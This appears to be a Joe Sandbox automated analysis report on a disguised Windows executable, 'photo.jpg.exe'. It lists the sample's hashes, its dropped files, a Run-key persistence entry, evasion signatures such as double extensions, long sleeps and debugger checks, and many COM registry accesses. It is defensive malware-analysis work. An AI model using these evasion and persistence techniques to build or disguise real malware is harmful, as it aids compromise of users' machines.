Joe Sandbox Cloud Basic Analysis Report
Edit tour

Windows Analysis Report
photo.jpg.exe

Overview

General Information

Sample name:photo.jpg.exe
(renamed file extension from pif to exe)
Original sample name:photo.jpg.pif
Analysis ID:1654778
MD5:a5fb35b15c22b46a62905bf7a9f492bf
SHA1:216a53be8dab4818a90044e5940cc3f13e8ab604
SHA256:5727cc8ef222a2a0f24ed139bbd4de56b0f09806561074d40ed4d62e40df1ad5
Infos:

Detection

Score:80
Range:0 - 100
Confidence:100%

Signatures

Antivirus / Scanner detection for submitted sample
Multi AV Scanner detection for dropped file
Multi AV Scanner detection for submitted file
.NET source code contains potential unpacker
Joe Sandbox ML detected suspicious sample
PE file contains section with special chars
Uses an obfuscated file name to hide its real file extension (double extension)
Allocates memory with a write watch (potentially for evading sandboxes)
Checks if the current process is being debugged
Contains long sleeps (>= 3 min)
Creates COM task schedule object (often to register a task for autostart)
Creates a process in suspended mode (likely to inject code)
Detected TCP or UDP traffic on non-standard ports
Drops PE files
Enables debug privileges
Entry point lies outside standard sections
Found a high number of Window / User specific system calls (may be a loop to detect user behavior)
HTTP GET or POST without a user agent
JA3 SSL client fingerprint seen in connection with other malware
May sleep (evasive loops) to hinder dynamic analysis
One or more processes crash
PE file contains an invalid checksum
PE file contains executable resources (Code or Archives)
PE file contains more sections than normal
PE file contains sections with non-standard names
Queries keyboard layouts
Queries the volume information (name, serial number etc) of a device
Sample file is different than original file name gathered from version info
Sigma detected: CurrentVersion Autorun Keys Modification

Classification

RansomwareSpreadingPhishingBankerTrojan / BotAdwareSpywareExploiterEvaderMinercleansuspiciousmalicious

Process Tree

  • System is w10x64
  • photo.jpg.exe (PID: 7144 cmdline: "C:\Users\user\Desktop\photo.jpg.exe" MD5: A5FB35B15C22B46A62905BF7A9F492BF)
    • TASLogin.exe (PID: 7304 cmdline: "C:\Users\user\be24a5a2-f663-4e93-be62-2dc99eb7c31e042\TASLogin.exe" MD5: 7CA41E122724C2D808BF73B7A5129365)
      • WerFault.exe (PID: 7432 cmdline: C:\Windows\SysWOW64\WerFault.exe -u -p 7304 -s 1600 MD5: C31336C1EFC2CCB44B4326EA793040F2)
      • WerFault.exe (PID: 7496 cmdline: C:\Windows\SysWOW64\WerFault.exe -u -p 7304 -s 1656 MD5: C31336C1EFC2CCB44B4326EA793040F2)
  • TASLogin.exe (PID: 7528 cmdline: "C:\Users\user\be24a5a2-f663-4e93-be62-2dc99eb7c31e042\TASLogin.exe" MD5: 7CA41E122724C2D808BF73B7A5129365)
    • WerFault.exe (PID: 7612 cmdline: C:\Windows\SysWOW64\WerFault.exe -u -p 7528 -s 1376 MD5: C31336C1EFC2CCB44B4326EA793040F2)
    • WerFault.exe (PID: 7660 cmdline: C:\Windows\SysWOW64\WerFault.exe -u -p 7528 -s 1384 MD5: C31336C1EFC2CCB44B4326EA793040F2)
  • TASLogin.exe (PID: 7700 cmdline: "C:\Users\user\be24a5a2-f663-4e93-be62-2dc99eb7c31e042\TASLogin.exe" MD5: 7CA41E122724C2D808BF73B7A5129365)
    • WerFault.exe (PID: 7768 cmdline: C:\Windows\SysWOW64\WerFault.exe -u -p 7700 -s 1460 MD5: C31336C1EFC2CCB44B4326EA793040F2)
    • WerFault.exe (PID: 7804 cmdline: C:\Windows\SysWOW64\WerFault.exe -u -p 7700 -s 1468 MD5: C31336C1EFC2CCB44B4326EA793040F2)
  • cleanup

Malware Configuration

No configs have been found

Yara Signatures

No yara matches

Sigma Signatures

System Summary

barindex
Source: Registry Key setAuthor: Victor Sergeev, Daniil Yugoslavskiy, Gleb Sukhodolskiy, Timur Zinniatullin, oscd.community, Tim Shelton, frack113 (split): Data: Details: C:\Users\user\be24a5a2-f663-4e93-be62-2dc99eb7c31e042\TASLogin.exe, EventID: 13, EventType: SetValue, Image: C:\Users\user\be24a5a2-f663-4e93-be62-2dc99eb7c31e042\TASLogin.exe, ProcessId: 7304, TargetObject: HKEY_CURRENT_USER\SOFTWARE\Microsoft\Windows\CurrentVersion\Run\TASLogin

Suricata Signatures

No Suricata rule has matched

Joe Sandbox Signatures

  • AV Detection
  • Compliance
  • Spreading
  • Networking
  • System Summary
  • Data Obfuscation
  • Persistence and Installation Behavior
  • Boot Survival
  • Hooking and other Techniques for Hiding and Protection
  • Malware Analysis System Evasion
  • Anti Debugging
  • HIPS / PFW / Operating System Protection Evasion
  • Language, Device and Operating System Detection

Click to jump to signature section

Show All Signature Results

AV Detection

barindex
Source: photo.jpg.exeAvira: detected
Source: C:\Users\user\be24a5a2-f663-4e93-be62-2dc99eb7c31e042\commonbase.dllReversingLabs: Detection: 39%
Source: photo.jpg.exeVirustotal: Detection: 34%Perma Link
Source: Submited SampleNeural Call Log Analysis: 91.5%
Source: unknownHTTPS traffic detected: 3.5.150.219:443 -> 192.168.2.9:49684 version: TLS 1.2
Source: photo.jpg.exeStatic PE information: HIGH_ENTROPY_VA, DYNAMIC_BASE, NX_COMPAT, NO_SEH, TERMINAL_SERVER_AWARE
Source: Binary string: C:\Users\Administrator\Desktop\WindowsFormsApp20250321\WindowsFormsApp\WindowsFormsApp\obj\Release\WindowsFormsApp.pdb source: photo.jpg.exe
Source: Binary string: D:\Workspace\p-2ed35f15174943f6b676502b51f53d81\Output\TASLogin.pdb source: TASLogin.exe, 0000000E.00000000.1321310909.0000000000454000.00000002.00000001.01000000.0000000E.sdmp, TASLogin.exe, 00000014.00000000.1425365427.0000000000454000.00000002.00000001.01000000.0000000E.sdmp, TASLogin.exe, 00000019.00000000.1510046802.0000000000454000.00000002.00000001.01000000.0000000E.sdmp, TASLogin.exe.0.dr
Source: Binary string: D:\Workspace\p-2ed35f15174943f6b676502b51f53d81\Output\TASLogin.pdbTT source: TASLogin.exe, 0000000E.00000000.1321310909.0000000000454000.00000002.00000001.01000000.0000000E.sdmp, TASLogin.exe, 00000014.00000000.1425365427.0000000000454000.00000002.00000001.01000000.0000000E.sdmp, TASLogin.exe, 00000019.00000000.1510046802.0000000000454000.00000002.00000001.01000000.0000000E.sdmp, TASLogin.exe.0.dr
Source: C:\Users\user\be24a5a2-f663-4e93-be62-2dc99eb7c31e042\TASLogin.exeKey opened: HKEY_LOCAL_MACHINE\SOFTWARE\Classes\WOW6432Node\CLSID\{0F87369F-A4E5-4CFC-BD3E-73E6154572DD}Jump to behavior
Source: C:\Users\user\be24a5a2-f663-4e93-be62-2dc99eb7c31e042\TASLogin.exeKey opened: HKEY_LOCAL_MACHINE\SOFTWARE\Classes\WOW6432Node\CLSID\{0f87369f-a4e5-4cfc-bd3e-73e6154572dd}\TreatAsJump to behavior
Source: C:\Users\user\be24a5a2-f663-4e93-be62-2dc99eb7c31e042\TASLogin.exeKey opened: HKEY_LOCAL_MACHINE\SOFTWARE\Classes\WOW6432Node\CLSID\{0f87369f-a4e5-4cfc-bd3e-73e6154572dd}\InprocServer32Jump to behavior
Source: C:\Users\user\be24a5a2-f663-4e93-be62-2dc99eb7c31e042\TASLogin.exeKey opened: HKEY_LOCAL_MACHINE\SOFTWARE\Classes\WOW6432Node\CLSID\{0f87369f-a4e5-4cfc-bd3e-73e6154572dd}\InprocHandler32Jump to behavior
Source: C:\Users\user\be24a5a2-f663-4e93-be62-2dc99eb7c31e042\TASLogin.exeKey opened: HKEY_LOCAL_MACHINE\SOFTWARE\Classes\WOW6432Node\CLSID\{0f87369f-a4e5-4cfc-bd3e-73e6154572dd}\InprocHandlerJump to behavior
Source: C:\Users\user\be24a5a2-f663-4e93-be62-2dc99eb7c31e042\TASLogin.exeKey opened: HKEY_LOCAL_MACHINE\SOFTWARE\Classes\WOW6432Node\CLSID\{0F87369F-A4E5-4CFC-BD3E-73E6154572DD}Jump to behavior
Source: C:\Users\user\be24a5a2-f663-4e93-be62-2dc99eb7c31e042\TASLogin.exeKey opened: HKEY_LOCAL_MACHINE\SOFTWARE\Classes\WOW6432Node\CLSID\{0f87369f-a4e5-4cfc-bd3e-73e6154572dd}\TreatAsJump to behavior
Source: C:\Users\user\be24a5a2-f663-4e93-be62-2dc99eb7c31e042\TASLogin.exeKey opened: HKEY_LOCAL_MACHINE\SOFTWARE\Classes\WOW6432Node\CLSID\{0f87369f-a4e5-4cfc-bd3e-73e6154572dd}\InprocServer32Jump to behavior
Source: C:\Users\user\be24a5a2-f663-4e93-be62-2dc99eb7c31e042\TASLogin.exeKey opened: HKEY_LOCAL_MACHINE\SOFTWARE\Classes\WOW6432Node\CLSID\{0f87369f-a4e5-4cfc-bd3e-73e6154572dd}\InprocHandler32Jump to behavior
Source: C:\Users\user\be24a5a2-f663-4e93-be62-2dc99eb7c31e042\TASLogin.exeKey opened: HKEY_LOCAL_MACHINE\SOFTWARE\Classes\WOW6432Node\CLSID\{0f87369f-a4e5-4cfc-bd3e-73e6154572dd}\InprocHandlerJump to behavior
Source: C:\Users\user\be24a5a2-f663-4e93-be62-2dc99eb7c31e042\TASLogin.exeKey opened: HKEY_LOCAL_MACHINE\SOFTWARE\Classes\WOW6432Node\CLSID\{0f87369f-a4e5-4cfc-bd3e-73e6154572dd}\LocalServer32Jump to behavior
Source: C:\Users\user\be24a5a2-f663-4e93-be62-2dc99eb7c31e042\TASLogin.exeKey opened: HKEY_LOCAL_MACHINE\SOFTWARE\Classes\WOW6432Node\CLSID\{0f87369f-a4e5-4cfc-bd3e-73e6154572dd}\LocalServerJump to behavior
Source: C:\Users\user\be24a5a2-f663-4e93-be62-2dc99eb7c31e042\TASLogin.exeKey opened: HKEY_LOCAL_MACHINE\SOFTWARE\Classes\WOW6432Node\CLSID\{0F87369F-A4E5-4CFC-BD3E-73E6154572DD}Jump to behavior
Source: C:\Users\user\be24a5a2-f663-4e93-be62-2dc99eb7c31e042\TASLogin.exeKey opened: HKEY_LOCAL_MACHINE\SOFTWARE\Classes\WOW6432Node\CLSID\{0f87369f-a4e5-4cfc-bd3e-73e6154572dd}\ElevationJump to behavior
Source: C:\Users\user\be24a5a2-f663-4e93-be62-2dc99eb7c31e042\TASLogin.exeKey opened: HKEY_LOCAL_MACHINE\SOFTWARE\Classes\WOW6432Node\CLSID\{0F87369F-A4E5-4CFC-BD3E-73E6154572DD}Jump to behavior
Source: C:\Users\user\be24a5a2-f663-4e93-be62-2dc99eb7c31e042\TASLogin.exeKey opened: HKEY_LOCAL_MACHINE\SOFTWARE\Classes\WOW6432Node\CLSID\{0f87369f-a4e5-4cfc-bd3e-73e6154572dd}\TreatAsJump to behavior
Source: C:\Users\user\be24a5a2-f663-4e93-be62-2dc99eb7c31e042\TASLogin.exeKey opened: HKEY_CURRENT_USER_Classes\WOW6432Node\CLSID\{0F87369F-A4E5-4CFC-BD3E-73E6154572DD}Jump to behavior
Source: C:\Users\user\be24a5a2-f663-4e93-be62-2dc99eb7c31e042\TASLogin.exeKey opened: HKEY_LOCAL_MACHINE\Software\Classes\WOW6432Node\CLSID\{0F87369F-A4E5-4CFC-BD3E-73E6154572DD}Jump to behavior
Source: C:\Users\user\be24a5a2-f663-4e93-be62-2dc99eb7c31e042\TASLogin.exeKey opened: HKEY_CURRENT_USER_Classes\WOW6432Node\CLSID\{0f87369f-a4e5-4cfc-bd3e-73e6154572dd}\TreatAsJump to behavior
Source: C:\Users\user\be24a5a2-f663-4e93-be62-2dc99eb7c31e042\TASLogin.exeKey opened: HKEY_LOCAL_MACHINE\SOFTWARE\Classes\WOW6432Node\CLSID\{0f87369f-a4e5-4cfc-bd3e-73e6154572dd}\TreatAsJump to behavior
Source: C:\Users\user\be24a5a2-f663-4e93-be62-2dc99eb7c31e042\TASLogin.exeKey opened: HKEY_CURRENT_USER_Classes\WOW6432Node\CLSID\{0f87369f-a4e5-4cfc-bd3e-73e6154572dd}Jump to behavior
Source: C:\Users\user\be24a5a2-f663-4e93-be62-2dc99eb7c31e042\TASLogin.exeKey opened: HKEY_CURRENT_USER_Classes\WOW6432Node\CLSID\{0f87369f-a4e5-4cfc-bd3e-73e6154572dd}Jump to behavior
Source: C:\Users\user\be24a5a2-f663-4e93-be62-2dc99eb7c31e042\TASLogin.exeKey opened: HKEY_CURRENT_USER_Classes\WOW6432Node\CLSID\{0f87369f-a4e5-4cfc-bd3e-73e6154572dd}\InprocServer32Jump to behavior
Source: C:\Users\user\be24a5a2-f663-4e93-be62-2dc99eb7c31e042\TASLogin.exeKey opened: HKEY_LOCAL_MACHINE\SOFTWARE\Classes\WOW6432Node\CLSID\{0f87369f-a4e5-4cfc-bd3e-73e6154572dd}\InprocServer32Jump to behavior
Source: C:\Users\user\be24a5a2-f663-4e93-be62-2dc99eb7c31e042\TASLogin.exeKey opened: HKEY_CURRENT_USER_Classes\WOW6432Node\CLSID\{0f87369f-a4e5-4cfc-bd3e-73e6154572dd}\InprocServer32Jump to behavior
Source: C:\Users\user\be24a5a2-f663-4e93-be62-2dc99eb7c31e042\TASLogin.exeKey opened: HKEY_CURRENT_USER_Classes\WOW6432Node\CLSID\{0f87369f-a4e5-4cfc-bd3e-73e6154572dd}\InprocHandler32Jump to behavior
Source: C:\Users\user\be24a5a2-f663-4e93-be62-2dc99eb7c31e042\TASLogin.exeKey opened: HKEY_LOCAL_MACHINE\SOFTWARE\Classes\WOW6432Node\CLSID\{0f87369f-a4e5-4cfc-bd3e-73e6154572dd}\InprocHandler32Jump to behavior
Source: C:\Users\user\be24a5a2-f663-4e93-be62-2dc99eb7c31e042\TASLogin.exeKey opened: HKEY_CURRENT_USER_Classes\WOW6432Node\CLSID\{0f87369f-a4e5-4cfc-bd3e-73e6154572dd}\InprocHandlerJump to behavior
Source: C:\Users\user\be24a5a2-f663-4e93-be62-2dc99eb7c31e042\TASLogin.exeKey opened: HKEY_LOCAL_MACHINE\SOFTWARE\Classes\WOW6432Node\CLSID\{0f87369f-a4e5-4cfc-bd3e-73e6154572dd}\InprocHandlerJump to behavior
Source: C:\Users\user\be24a5a2-f663-4e93-be62-2dc99eb7c31e042\TASLogin.exeKey opened: HKEY_CURRENT_USER_Classes\WOW6432Node\CLSID\{0F87369F-A4E5-4CFC-BD3E-73E6154572DD}Jump to behavior
Source: C:\Users\user\be24a5a2-f663-4e93-be62-2dc99eb7c31e042\TASLogin.exeKey opened: HKEY_LOCAL_MACHINE\Software\Classes\WOW6432Node\CLSID\{0F87369F-A4E5-4CFC-BD3E-73E6154572DD}Jump to behavior
Source: C:\Users\user\be24a5a2-f663-4e93-be62-2dc99eb7c31e042\TASLogin.exeKey opened: HKEY_CURRENT_USER_Classes\WOW6432Node\CLSID\{0f87369f-a4e5-4cfc-bd3e-73e6154572dd}\TreatAsJump to behavior
Source: C:\Users\user\be24a5a2-f663-4e93-be62-2dc99eb7c31e042\TASLogin.exeKey opened: HKEY_LOCAL_MACHINE\SOFTWARE\Classes\WOW6432Node\CLSID\{0f87369f-a4e5-4cfc-bd3e-73e6154572dd}\TreatAsJump to behavior
Source: C:\Users\user\be24a5a2-f663-4e93-be62-2dc99eb7c31e042\TASLogin.exeKey opened: HKEY_CURRENT_USER_Classes\WOW6432Node\CLSID\{0f87369f-a4e5-4cfc-bd3e-73e6154572dd}Jump to behavior
Source: C:\Users\user\be24a5a2-f663-4e93-be62-2dc99eb7c31e042\TASLogin.exeKey opened: HKEY_CURRENT_USER_Classes\WOW6432Node\CLSID\{0f87369f-a4e5-4cfc-bd3e-73e6154572dd}\InprocServer32Jump to behavior
Source: C:\Users\user\be24a5a2-f663-4e93-be62-2dc99eb7c31e042\TASLogin.exeKey opened: HKEY_LOCAL_MACHINE\SOFTWARE\Classes\WOW6432Node\CLSID\{0f87369f-a4e5-4cfc-bd3e-73e6154572dd}\InprocServer32Jump to behavior
Source: C:\Users\user\be24a5a2-f663-4e93-be62-2dc99eb7c31e042\TASLogin.exeKey opened: HKEY_CURRENT_USER_Classes\WOW6432Node\CLSID\{0f87369f-a4e5-4cfc-bd3e-73e6154572dd}\InprocHandler32Jump to behavior
Source: C:\Users\user\be24a5a2-f663-4e93-be62-2dc99eb7c31e042\TASLogin.exeKey opened: HKEY_LOCAL_MACHINE\SOFTWARE\Classes\WOW6432Node\CLSID\{0f87369f-a4e5-4cfc-bd3e-73e6154572dd}\InprocHandler32Jump to behavior
Source: C:\Users\user\be24a5a2-f663-4e93-be62-2dc99eb7c31e042\TASLogin.exeKey opened: HKEY_CURRENT_USER_Classes\WOW6432Node\CLSID\{0f87369f-a4e5-4cfc-bd3e-73e6154572dd}\InprocHandlerJump to behavior
Source: C:\Users\user\be24a5a2-f663-4e93-be62-2dc99eb7c31e042\TASLogin.exeKey opened: HKEY_LOCAL_MACHINE\SOFTWARE\Classes\WOW6432Node\CLSID\{0f87369f-a4e5-4cfc-bd3e-73e6154572dd}\InprocHandlerJump to behavior
Source: C:\Users\user\be24a5a2-f663-4e93-be62-2dc99eb7c31e042\TASLogin.exeKey opened: HKEY_CURRENT_USER_Classes\WOW6432Node\CLSID\{0f87369f-a4e5-4cfc-bd3e-73e6154572dd}\LocalServer32Jump to behavior
Source: C:\Users\user\be24a5a2-f663-4e93-be62-2dc99eb7c31e042\TASLogin.exeKey opened: HKEY_LOCAL_MACHINE\SOFTWARE\Classes\WOW6432Node\CLSID\{0f87369f-a4e5-4cfc-bd3e-73e6154572dd}\LocalServer32Jump to behavior
Source: C:\Users\user\be24a5a2-f663-4e93-be62-2dc99eb7c31e042\TASLogin.exeKey opened: HKEY_CURRENT_USER_Classes\WOW6432Node\CLSID\{0f87369f-a4e5-4cfc-bd3e-73e6154572dd}Jump to behavior
Source: C:\Users\user\be24a5a2-f663-4e93-be62-2dc99eb7c31e042\TASLogin.exeKey opened: HKEY_CURRENT_USER_Classes\WOW6432Node\CLSID\{0f87369f-a4e5-4cfc-bd3e-73e6154572dd}\LocalServerJump to behavior
Source: C:\Users\user\be24a5a2-f663-4e93-be62-2dc99eb7c31e042\TASLogin.exeKey opened: HKEY_LOCAL_MACHINE\SOFTWARE\Classes\WOW6432Node\CLSID\{0f87369f-a4e5-4cfc-bd3e-73e6154572dd}\LocalServerJump to behavior
Source: C:\Users\user\be24a5a2-f663-4e93-be62-2dc99eb7c31e042\TASLogin.exeKey opened: HKEY_CURRENT_USER_Classes\WOW6432Node\CLSID\{0F87369F-A4E5-4CFC-BD3E-73E6154572DD}Jump to behavior
Source: C:\Users\user\be24a5a2-f663-4e93-be62-2dc99eb7c31e042\TASLogin.exeKey opened: HKEY_LOCAL_MACHINE\Software\Classes\WOW6432Node\CLSID\{0F87369F-A4E5-4CFC-BD3E-73E6154572DD}Jump to behavior
Source: C:\Users\user\be24a5a2-f663-4e93-be62-2dc99eb7c31e042\TASLogin.exeKey opened: HKEY_CURRENT_USER_Classes\WOW6432Node\CLSID\{0f87369f-a4e5-4cfc-bd3e-73e6154572dd}\ElevationJump to behavior
Source: C:\Users\user\be24a5a2-f663-4e93-be62-2dc99eb7c31e042\TASLogin.exeKey opened: HKEY_LOCAL_MACHINE\SOFTWARE\Classes\WOW6432Node\CLSID\{0f87369f-a4e5-4cfc-bd3e-73e6154572dd}\ElevationJump to behavior
Source: C:\Users\user\be24a5a2-f663-4e93-be62-2dc99eb7c31e042\TASLogin.exeKey opened: HKEY_CURRENT_USER_Classes\WOW6432Node\CLSID\{0F87369F-A4E5-4CFC-BD3E-73E6154572DD}Jump to behavior
Source: C:\Users\user\be24a5a2-f663-4e93-be62-2dc99eb7c31e042\TASLogin.exeKey opened: HKEY_LOCAL_MACHINE\Software\Classes\WOW6432Node\CLSID\{0F87369F-A4E5-4CFC-BD3E-73E6154572DD}Jump to behavior
Source: C:\Users\user\be24a5a2-f663-4e93-be62-2dc99eb7c31e042\TASLogin.exeKey opened: HKEY_CURRENT_USER_Classes\WOW6432Node\CLSID\{0f87369f-a4e5-4cfc-bd3e-73e6154572dd}\TreatAsJump to behavior
Source: C:\Users\user\be24a5a2-f663-4e93-be62-2dc99eb7c31e042\TASLogin.exeKey opened: HKEY_LOCAL_MACHINE\SOFTWARE\Classes\WOW6432Node\CLSID\{0f87369f-a4e5-4cfc-bd3e-73e6154572dd}\TreatAsJump to behavior
Source: C:\Users\user\be24a5a2-f663-4e93-be62-2dc99eb7c31e042\TASLogin.exeKey opened: HKEY_CURRENT_USER_Classes\WOW6432Node\CLSID\{0F87369F-A4E5-4CFC-BD3E-73E6154572DD}Jump to behavior
Source: C:\Users\user\be24a5a2-f663-4e93-be62-2dc99eb7c31e042\TASLogin.exeKey opened: HKEY_LOCAL_MACHINE\Software\Classes\WOW6432Node\CLSID\{0F87369F-A4E5-4CFC-BD3E-73E6154572DD}Jump to behavior
Source: C:\Users\user\be24a5a2-f663-4e93-be62-2dc99eb7c31e042\TASLogin.exeKey opened: HKEY_CURRENT_USER_Classes\WOW6432Node\CLSID\{0f87369f-a4e5-4cfc-bd3e-73e6154572dd}\TreatAsJump to behavior
Source: C:\Users\user\be24a5a2-f663-4e93-be62-2dc99eb7c31e042\TASLogin.exeKey opened: HKEY_LOCAL_MACHINE\SOFTWARE\Classes\WOW6432Node\CLSID\{0f87369f-a4e5-4cfc-bd3e-73e6154572dd}\TreatAsJump to behavior
Source: C:\Users\user\be24a5a2-f663-4e93-be62-2dc99eb7c31e042\TASLogin.exeKey opened: HKEY_CURRENT_USER_Classes\WOW6432Node\CLSID\{0f87369f-a4e5-4cfc-bd3e-73e6154572dd}Jump to behavior
Source: C:\Users\user\be24a5a2-f663-4e93-be62-2dc99eb7c31e042\TASLogin.exeKey opened: HKEY_CURRENT_USER_Classes\WOW6432Node\CLSID\{0f87369f-a4e5-4cfc-bd3e-73e6154572dd}Jump to behavior
Source: C:\Users\user\be24a5a2-f663-4e93-be62-2dc99eb7c31e042\TASLogin.exeKey opened: HKEY_CURRENT_USER_Classes\WOW6432Node\CLSID\{0f87369f-a4e5-4cfc-bd3e-73e6154572dd}\InprocServer32Jump to behavior
Source: C:\Users\user\be24a5a2-f663-4e93-be62-2dc99eb7c31e042\TASLogin.exeKey opened: HKEY_LOCAL_MACHINE\SOFTWARE\Classes\WOW6432Node\CLSID\{0f87369f-a4e5-4cfc-bd3e-73e6154572dd}\InprocServer32Jump to behavior
Source: C:\Users\user\be24a5a2-f663-4e93-be62-2dc99eb7c31e042\TASLogin.exeKey opened: HKEY_CURRENT_USER_Classes\WOW6432Node\CLSID\{0f87369f-a4e5-4cfc-bd3e-73e6154572dd}\InprocServer32Jump to behavior
Source: C:\Users\user\be24a5a2-f663-4e93-be62-2dc99eb7c31e042\TASLogin.exeKey opened: HKEY_CURRENT_USER_Classes\WOW6432Node\CLSID\{0f87369f-a4e5-4cfc-bd3e-73e6154572dd}\InprocHandler32Jump to behavior
Source: C:\Users\user\be24a5a2-f663-4e93-be62-2dc99eb7c31e042\TASLogin.exeKey opened: HKEY_LOCAL_MACHINE\SOFTWARE\Classes\WOW6432Node\CLSID\{0f87369f-a4e5-4cfc-bd3e-73e6154572dd}\InprocHandler32Jump to behavior
Source: C:\Users\user\be24a5a2-f663-4e93-be62-2dc99eb7c31e042\TASLogin.exeKey opened: HKEY_CURRENT_USER_Classes\WOW6432Node\CLSID\{0f87369f-a4e5-4cfc-bd3e-73e6154572dd}\InprocHandlerJump to behavior
Source: C:\Users\user\be24a5a2-f663-4e93-be62-2dc99eb7c31e042\TASLogin.exeKey opened: HKEY_LOCAL_MACHINE\SOFTWARE\Classes\WOW6432Node\CLSID\{0f87369f-a4e5-4cfc-bd3e-73e6154572dd}\InprocHandlerJump to behavior
Source: C:\Users\user\be24a5a2-f663-4e93-be62-2dc99eb7c31e042\TASLogin.exeKey opened: HKEY_CURRENT_USER_Classes\WOW6432Node\CLSID\{0F87369F-A4E5-4CFC-BD3E-73E6154572DD}Jump to behavior
Source: C:\Users\user\be24a5a2-f663-4e93-be62-2dc99eb7c31e042\TASLogin.exeKey opened: HKEY_LOCAL_MACHINE\Software\Classes\WOW6432Node\CLSID\{0F87369F-A4E5-4CFC-BD3E-73E6154572DD}Jump to behavior
Source: C:\Users\user\be24a5a2-f663-4e93-be62-2dc99eb7c31e042\TASLogin.exeKey opened: HKEY_CURRENT_USER_Classes\WOW6432Node\CLSID\{0f87369f-a4e5-4cfc-bd3e-73e6154572dd}\TreatAsJump to behavior
Source: C:\Users\user\be24a5a2-f663-4e93-be62-2dc99eb7c31e042\TASLogin.exeKey opened: HKEY_LOCAL_MACHINE\SOFTWARE\Classes\WOW6432Node\CLSID\{0f87369f-a4e5-4cfc-bd3e-73e6154572dd}\TreatAsJump to behavior
Source: C:\Users\user\be24a5a2-f663-4e93-be62-2dc99eb7c31e042\TASLogin.exeKey opened: HKEY_CURRENT_USER_Classes\WOW6432Node\CLSID\{0f87369f-a4e5-4cfc-bd3e-73e6154572dd}Jump to behavior
Source: C:\Users\user\be24a5a2-f663-4e93-be62-2dc99eb7c31e042\TASLogin.exeKey opened: HKEY_CURRENT_USER_Classes\WOW6432Node\CLSID\{0f87369f-a4e5-4cfc-bd3e-73e6154572dd}\InprocServer32Jump to behavior
Source: C:\Users\user\be24a5a2-f663-4e93-be62-2dc99eb7c31e042\TASLogin.exeKey opened: HKEY_LOCAL_MACHINE\SOFTWARE\Classes\WOW6432Node\CLSID\{0f87369f-a4e5-4cfc-bd3e-73e6154572dd}\InprocServer32Jump to behavior
Source: C:\Users\user\be24a5a2-f663-4e93-be62-2dc99eb7c31e042\TASLogin.exeKey opened: HKEY_CURRENT_USER_Classes\WOW6432Node\CLSID\{0f87369f-a4e5-4cfc-bd3e-73e6154572dd}\InprocServer32Jump to behavior
Source: C:\Users\user\be24a5a2-f663-4e93-be62-2dc99eb7c31e042\TASLogin.exeKey opened: HKEY_CURRENT_USER_Classes\WOW6432Node\CLSID\{0f87369f-a4e5-4cfc-bd3e-73e6154572dd}\InprocHandler32Jump to behavior
Source: C:\Users\user\be24a5a2-f663-4e93-be62-2dc99eb7c31e042\TASLogin.exeKey opened: HKEY_LOCAL_MACHINE\SOFTWARE\Classes\WOW6432Node\CLSID\{0f87369f-a4e5-4cfc-bd3e-73e6154572dd}\InprocHandler32Jump to behavior
Source: C:\Users\user\be24a5a2-f663-4e93-be62-2dc99eb7c31e042\TASLogin.exeKey opened: HKEY_CURRENT_USER_Classes\WOW6432Node\CLSID\{0f87369f-a4e5-4cfc-bd3e-73e6154572dd}\InprocHandlerJump to behavior
Source: C:\Users\user\be24a5a2-f663-4e93-be62-2dc99eb7c31e042\TASLogin.exeKey opened: HKEY_LOCAL_MACHINE\SOFTWARE\Classes\WOW6432Node\CLSID\{0f87369f-a4e5-4cfc-bd3e-73e6154572dd}\InprocHandlerJump to behavior
Source: C:\Users\user\be24a5a2-f663-4e93-be62-2dc99eb7c31e042\TASLogin.exeKey opened: HKEY_CURRENT_USER_Classes\WOW6432Node\CLSID\{0f87369f-a4e5-4cfc-bd3e-73e6154572dd}\LocalServer32Jump to behavior
Source: C:\Users\user\be24a5a2-f663-4e93-be62-2dc99eb7c31e042\TASLogin.exeKey opened: HKEY_LOCAL_MACHINE\SOFTWARE\Classes\WOW6432Node\CLSID\{0f87369f-a4e5-4cfc-bd3e-73e6154572dd}\LocalServer32Jump to behavior
Source: C:\Users\user\be24a5a2-f663-4e93-be62-2dc99eb7c31e042\TASLogin.exeKey opened: HKEY_CURRENT_USER_Classes\WOW6432Node\CLSID\{0f87369f-a4e5-4cfc-bd3e-73e6154572dd}Jump to behavior
Source: C:\Users\user\be24a5a2-f663-4e93-be62-2dc99eb7c31e042\TASLogin.exeKey opened: HKEY_CURRENT_USER_Classes\WOW6432Node\CLSID\{0f87369f-a4e5-4cfc-bd3e-73e6154572dd}\LocalServerJump to behavior
Source: C:\Users\user\be24a5a2-f663-4e93-be62-2dc99eb7c31e042\TASLogin.exeKey opened: HKEY_LOCAL_MACHINE\SOFTWARE\Classes\WOW6432Node\CLSID\{0f87369f-a4e5-4cfc-bd3e-73e6154572dd}\LocalServerJump to behavior
Source: C:\Users\user\be24a5a2-f663-4e93-be62-2dc99eb7c31e042\TASLogin.exeKey opened: HKEY_CURRENT_USER_Classes\WOW6432Node\CLSID\{0F87369F-A4E5-4CFC-BD3E-73E6154572DD}Jump to behavior
Source: C:\Users\user\be24a5a2-f663-4e93-be62-2dc99eb7c31e042\TASLogin.exeKey opened: HKEY_LOCAL_MACHINE\Software\Classes\WOW6432Node\CLSID\{0F87369F-A4E5-4CFC-BD3E-73E6154572DD}Jump to behavior
Source: C:\Users\user\be24a5a2-f663-4e93-be62-2dc99eb7c31e042\TASLogin.exeKey opened: HKEY_CURRENT_USER_Classes\WOW6432Node\CLSID\{0f87369f-a4e5-4cfc-bd3e-73e6154572dd}\ElevationJump to behavior
Source: C:\Users\user\be24a5a2-f663-4e93-be62-2dc99eb7c31e042\TASLogin.exeKey opened: HKEY_LOCAL_MACHINE\SOFTWARE\Classes\WOW6432Node\CLSID\{0f87369f-a4e5-4cfc-bd3e-73e6154572dd}\ElevationJump to behavior
Source: C:\Users\user\be24a5a2-f663-4e93-be62-2dc99eb7c31e042\TASLogin.exeKey opened: HKEY_CURRENT_USER_Classes\WOW6432Node\CLSID\{0F87369F-A4E5-4CFC-BD3E-73E6154572DD}Jump to behavior
Source: C:\Users\user\be24a5a2-f663-4e93-be62-2dc99eb7c31e042\TASLogin.exeKey opened: HKEY_LOCAL_MACHINE\Software\Classes\WOW6432Node\CLSID\{0F87369F-A4E5-4CFC-BD3E-73E6154572DD}Jump to behavior
Source: C:\Users\user\be24a5a2-f663-4e93-be62-2dc99eb7c31e042\TASLogin.exeKey opened: HKEY_CURRENT_USER_Classes\WOW6432Node\CLSID\{0f87369f-a4e5-4cfc-bd3e-73e6154572dd}\TreatAsJump to behavior
